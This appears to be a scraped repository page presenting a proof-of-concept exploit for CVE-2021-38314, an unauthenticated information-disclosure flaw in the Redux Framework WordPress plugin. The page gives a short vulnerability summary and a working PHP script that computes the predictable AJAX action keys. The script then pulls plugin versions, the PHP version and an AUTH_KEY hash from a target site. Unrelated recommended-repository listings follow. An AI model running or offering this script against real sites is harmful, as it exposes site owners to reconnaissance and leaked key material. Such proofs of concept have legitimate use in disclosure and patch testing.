cve-2021-38314 - Unauthenticated Sensitive Information Disclosure

Overview

cve-2021-38314 - Unauthenticated Sensitive Information Disclosure

The Gutenberg Template Library & Redux Framework plugin <= 4.2.11 for WordPress registered several AJAX actions available to unauthenticated users in the includes function in redux-core/class-redux-core.php that were unique to a given site but deterministic and predictable given that they were based on an md5 hash of the site URL with a known salt value of '-redux' and an md5 hash of the previous hash with a known salt value of '-support'. These AJAX actions could be used to retrieve a list of active plugins and their versions, the site's PHP version, and an unsalted md5 hash of site’s AUTH_KEY concatenated with the SECURE_AUTH_KEY [1][2]

Source code

<?php
$target = "https://target.com";  
$key1 = md5("$target/-redux");
$key2 = file_get_contents("$target/wp-admin/admin-ajax.php?action=$key1");
$key3 = md5($key2. '-support');
$redux_code = file_get_contents("http://verify.redux.io/?hash=$key3&site=$target/");
echo file_get_contents("$target/wp-admin/admin-ajax.php?action=$key3&code=$redux_code");

save as the source code with .php extension

How To Run

usage

References:

You might also like...
Tcc realizado na Etec de Guaianazes (2021),onde eu fui o back-end e Vinicius de Almeida foi o front-end.

TCC-Facilita+ Todos os arquivos do projeto de TCC (Facilita+) da Etec de Guaianases realizado em 2021 1° Para utilizar os arquivos,primeiro será nesce

James Thatcher's solutions for Advent Of Code 2021 in PHP 8.1
James Thatcher's solutions for Advent Of Code 2021 in PHP 8.1

Advent of Code 2021 PHP The solutions to advent of code 2021, solved using PHP 8.1. By James Thatcher Solutions 🥳 🎉 🎄 Day 1 🎅 Day 2 ☃️ Day 3 🦌 Da

Extracts information about web pages, like youtube videos, twitter statuses or blog articles.
Extracts information about web pages, like youtube videos, twitter statuses or blog articles.

Essence is a simple PHP library to extract media information from websites, like youtube videos, twitter statuses or blog articles. If you were alread

Fact Extraction and VERification Over Unstructured and Structured information

Repository for Fact Extraction and VERification Over Unstructured and Structured information (FEVEROUS), used for the FEVER Workshop Shared Task at EMNLP2021.

PHP Text Analysis is a library for performing Information Retrieval (IR) and Natural Language Processing (NLP) tasks using the PHP language

php-text-analysis PHP Text Analysis is a library for performing Information Retrieval (IR) and Natural Language Processing (NLP) tasks using the PHP l

Add information about PGP public keys on upload in Kirby v3
Add information about PGP public keys on upload in Kirby v3

Kirby3 GnuPG This plugin adds information about PGP public keys on upload, using gpg binary (which needs to be installed for this to work). Getting st

Here is an Instagram Guest API. Gather all public information as JSON format without logging yourself.

Here is an Instagram Guest API. Gather all public information as JSON format without logging yourself. It's all automation and time saving.

This is a PHP library developed for Symfony to collect address information.

Goldbach Algorithms Address Info Getter (fondly nicknamed AIG) is a PHP library developed for Symfony to collect address information.

Owner
Tri Wanda Septian
perpetual learner
Tri Wanda Septian
Major Security Vulnerability on PrestaShop Websites - CVE-2022-31101

Fix Major Security Vulnerability on PrestaShop Websites ?? CVE-2022-31101 detector and fixer! A newly found exploit could allow remote attackers to ta

Mathias Reker ⚡️ 25 Nov 22, 2022
CVE-2022-29221 Proof of Concept Code

CVE-2022-29221-PoC This is a very basic Smarty sceleton app with a single template that shows the Proof of Concept code for CVE-2022-29221. Injection

S Bani 12 Nov 4, 2022
CRUD Build a system to insert student name information, grade the class name, and edit and delete this information

CRUD Build a system to insert student name information, grade the class name, and edit and delete this information

Sajjad 2 Aug 14, 2022
Repository untuk kuliah rekayasa web ss 2021

About Laravel Laravel is a web application framework with expressive, elegant syntax. We believe development must be an enjoyable and creative experie

Sandhika Galih 7 Jul 11, 2022
ShellHacks 2021 Project: URide is a carpooling app for College students to get to and from campus

ShellHacks 2021 Project: URide is a carpooling app for College students to get to and from campus. Focused on scheduling it matches you to students nearby with similar schedules to alleviate campus parking and emissions.

Kayla Marcantonio 2 Sep 27, 2021
The slides and demo files for my Alpine Day 2021 talk

Building a Better Dialog Austen Cameron - @austencam This repository contains the slides and demos for my talk from Alpine Day 2021. Below, you'll fin

Austen Cameron 9 Nov 16, 2021
Public solutions and challenges from sinf ctf 2021

SINFCTF2021 CTF Challenges (and official solutions) created for SINFCTF2021, a companion CTF for Semana de Informática 2021. There's a folder for each

NIAEFEUP 5 Sep 30, 2022
Code de la nuit de l'info 2021

NuitDeInfo2021 ⚠️ Warning: Be very careful here! documetation utilisation git soit par terminal ou dans un IDE (Atom, PhpStorm) ou GitHub Desktop Star

null 0 Sep 20, 2022
Repo pour la Nuit de l'Info 2021, équipe Passage Python

Passage Python Repo pour la Nuit de l'Info 2021, équipe Passage Python Les membres de l'équipe sont : Florian Duzes, FloDarPie Theo Cavailles, igneefl

Florian Duzes 3 Dec 3, 2021
Docker images for Cyber_Security hakathon 2021.

This repository contains a set of vulnerable Docker images for attacking the container environment compiled for Cyber_Security hackathon 2021. Require

null 1 Dec 1, 2022